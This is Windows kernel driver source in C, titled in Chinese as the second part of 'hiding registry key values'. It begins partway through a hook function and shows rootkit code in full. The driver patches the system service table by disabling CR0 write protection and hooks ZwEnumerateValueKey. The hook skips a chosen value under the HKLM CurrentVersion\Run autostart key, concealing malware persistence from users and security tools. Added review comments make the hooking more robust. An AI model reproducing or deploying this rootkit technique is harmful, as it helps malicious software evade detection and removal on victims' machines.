隐藏注册表的键值(2)
NTSTATUS status;
PWSTR ValueName;
ULONG NameLen;
status=((REALZWENUMERATEVALUEKEY)(RealZwEnumerateValueKey))(
KeyHandle,
Index,
KeyValueInformationClass,
KeyValueInformation,
Length,
ResultLength);
pKey=GetPointer(KeyHandle);
if (pKey)
{
pUniName=ExAllocatePool(NonPagedPool,1024*2);
pUniName->MaximumLength=512*2;
memset(pUniName,0,pUniName->MaximumLength);
if(NT_SUCCESS(ObQueryNameString(pKey,pUniName,512*2,&actuallen)))
{
RtlUnicodeStringToAnsiString(&keyname,pUniName,TRUE);
DbgPrint("%ws
",pUniName->Buffer);
keyname.Buffer=_strupr(keyname.Buffer);
if (strcmp(keyname.Buffer,"\REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN")==0)
{
ValueName =((PKEY_VALUE_FULL_INFORMATION)KeyValueInformation)->Name;
if (ValueName!=NULL&&wcsstr(ValueName,HideValue)!=NULL)
{
Index++;
ValueName=NULL;
return ((REALZWENUMERATEVALUEKEY)(RealZwEnumerateValueKey))(
KeyHandle,
Index,
KeyValueInformationClass,
KeyValueInformation,
Length,
ResultLength);
}
//DbgPrint("ValueName=%ws
",ValueName);
}
}
}
return ((REALZWENUMERATEVALUEKEY)(RealZwEnumerateValueKey))(
KeyHandle,
Index,
KeyValueInformationClass,
KeyValueInformation,
Length,
ResultLength);
}
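/*
 * HookApi - install MyZwEnumerateValueKey in the system service table.
 *
 * Saves the current ZwEnumerateValueKey entry (looked up through the file's
 * SYSCALL macro) in RealZwEnumerateValueKey so the hook can pass calls
 * through, then overwrites that entry with MyZwEnumerateValueKey.  The
 * table lives in read-only memory, so CR0.WP is cleared around the write
 * and the saved CR0 value is restored afterwards.
 *
 * Returns STATUS_SUCCESS when the hook is installed (or already installed),
 * STATUS_UNSUCCESSFUL when no original entry could be read.
 *
 * NOTE(review): x86 MSVC inline assembly and direct service-table patching;
 * this does not carry over to x64 kernels, where the table is protected.
 */
NTSTATUS HookApi()
{
    KIRQL oldIrql;
    ULONG savedCr0;

    /* Re-entry guard: hooking a second time would record our own hook as
     * the "real" function and make MyZwEnumerateValueKey call itself
     * forever.  Assumes RealZwEnumerateValueKey is a zero-initialised
     * file-scope variable -- confirm at its definition. */
    if (RealZwEnumerateValueKey != NULL)
        return STATUS_SUCCESS;

    RealZwEnumerateValueKey = (REALZWENUMERATEVALUEKEY)SYSCALL(ZwEnumerateValueKey);
    if (RealZwEnumerateValueKey == NULL)
        return STATUS_UNSUCCESSFUL;

    /* CR0 is per-processor.  Raise to DISPATCH_LEVEL so this thread cannot
     * be preempted and resumed on another CPU (where WP is still set and
     * the write below would fault) between clearing and restoring the bit. */
    KeRaiseIrql(DISPATCH_LEVEL, &oldIrql);
    _asm {
        mov eax, cr0
        mov savedCr0, eax
        and eax, not 10000h
        mov cr0, eax
    }

    /* MSVC extension (assignment through a cast lvalue), kept because the
     * rest of the file relies on SYSCALL() naming the table slot. */
    (REALZWENUMERATEVALUEKEY)SYSCALL(ZwEnumerateValueKey) = MyZwEnumerateValueKey;

    /* Put back exactly what was there instead of blindly setting WP. */
    _asm {
        mov eax, savedCr0
        mov cr0, eax
    }
    KeLowerIrql(oldIrql);

    return STATUS_SUCCESS;
}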
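/*
 * UnHook - restore the original ZwEnumerateValueKey service table entry.
 *
 * Writes RealZwEnumerateValueKey (saved by HookApi) back into the slot that
 * SYSCALL(ZwEnumerateValueKey) names, clearing CR0.WP around the write the
 * same way HookApi does.  Returns STATUS_SUCCESS.  A call made before
 * HookApi has saved an original is a no-op rather than a NULL write.
 *
 * NOTE(review): nothing here waits for threads already executing inside
 * MyZwEnumerateValueKey; if the driver image is unmapped while such a call
 * is in flight, that thread faults.  Confirm the unload path handles this.
 */
NTSTATUS UnHook()
{
    KIRQL oldIrql;
    ULONG savedCr0;

    /* DriverUnload calls us unconditionally.  With no saved original there
     * is nothing to restore, and storing NULL into the table would crash
     * the next caller of ZwEnumerateValueKey. */
    if (RealZwEnumerateValueKey == NULL)
        return STATUS_SUCCESS;

    /* Same per-CPU CR0 reasoning as HookApi: no preemption while WP is off. */
    KeRaiseIrql(DISPATCH_LEVEL, &oldIrql);
    _asm {
        mov eax, cr0
        mov savedCr0, eax
        and eax, not 10000h
        mov cr0, eax
    }

    (REALZWENUMERATEVALUEKEY)SYSCALL(ZwEnumerateValueKey) = RealZwEnumerateValueKey;

    _asm {
        mov eax, savedCr0
        mov cr0, eax
    }
    KeLowerIrql(oldIrql);

    return STATUS_SUCCESS;
}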
/*
 * DriverUnload - unload callback registered in DriverEntry.
 *
 * Logs the unload, removes the service table hook through UnHook() and
 * hands UnHook's status back to the caller.
 *
 * NOTE(review): the WDK declares PDRIVER_UNLOAD as returning VOID, so the
 * NTSTATUS return type here does not match the DriverUnload field it is
 * assigned to in DriverEntry -- confirm the build accepts the assignment.
 */
NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
    DbgPrint("OnUnload called!\n");
    return UnHook();
}
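/*
 * DriverEntry - driver initialisation.
 *
 * Registers DriverUnload and installs the ZwEnumerateValueKey hook.  The
 * status HookApi returns is checked instead of discarded: on failure the
 * error is logged and returned, so the driver does not report success while
 * no hook is in place.
 *
 * theRegistryPath is not used.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
                     IN PUNICODE_STRING theRegistryPath)
{
    NTSTATUS status;

    UNREFERENCED_PARAMETER(theRegistryPath);

    theDriverObject->DriverUnload = DriverUnload;

    status = HookApi();
    if (!NT_SUCCESS(status)) {
        DbgPrint("HookApi failed: 0x%08X\n", status);
        return status;
    }

    DbgPrint("Hook Called!\n");
    return STATUS_SUCCESS;
}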